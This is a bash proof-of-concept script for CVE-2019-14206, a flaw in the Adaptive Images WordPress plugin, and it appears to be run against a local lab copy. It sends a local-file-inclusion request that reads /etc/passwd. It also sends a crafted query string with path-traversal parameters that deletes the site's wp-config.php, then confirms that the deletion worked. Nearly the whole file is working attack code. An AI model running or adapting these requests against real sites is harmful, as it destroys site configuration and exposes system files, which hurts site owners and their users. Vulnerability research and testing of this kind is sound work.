#!/bin/bash
# CVE-2019-14206 - Adaptive Images for WordPress Arbitrary File Deletion
# Test script to demonstrate the vulnerability

echo "=== CVE-2019-14206 PoC Test ==="
echo ""

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Base URL of vulnerable plugin
BASE_URL="${1:-http://localhost:8000}"
SCRIPT_PATH="/adaptive-images-script.php"
FULL_URL="${BASE_URL}${SCRIPT_PATH}"

echo -e "${YELLOW}[*] Testing vulnerable plugin at: ${FULL_URL}${NC}"
echo ""

# Check if target file exists before attack
TARGET_FILE="/Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/vulnerable-plugin/wp-config.php"
if [ -f "$TARGET_FILE" ]; then
    echo -e "${GREEN}[+] Target file exists: $TARGET_FILE${NC}"
else
    echo -e "${RED}[-] Target file not found: $TARGET_FILE${NC}"
    exit 1
fi

# Test 1: Basic LFI test (source_file parameter)
echo -e "${YELLOW}[*] Test 1: Testing LFI with source_file parameter...${NC}"
curl -s "${FULL_URL}?test=1&adaptive-images-settings[source_file]=/etc/passwd" | grep -q "root:" && echo -e "${GREEN}[+] LFI Vulnerability Confirmed!${NC}" || echo -e "${RED}[-] LFI Test Failed${NC}"

# Test 2: Arbitrary File Deletion
echo -e "${YELLOW}[*] Test 2: Testing Arbitrary File Deletion...${NC}"
EXPLOIT_URL="${FULL_URL}?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

echo "[*] Sending exploit request..."
RESPONSE=$(curl -s "$EXPLOIT_URL")

echo "[*] Response:"
echo "$RESPONSE"

# Check if file was deleted
if [ ! -f "$TARGET_FILE" ]; then
    echo ""
    echo -e "${GREEN}[+] SUCCESS! File deleted: $TARGET_FILE${NC}"
    echo -e "${GREEN}[+] Arbitrary File Deletion Vulnerability Confirmed!${NC}"
else
    echo ""
    echo -e "${RED}[-] File still exists - exploit may have failed${NC}"
fi

echo ""
echo -e "${YELLOW}[*] Test completed${NC}"
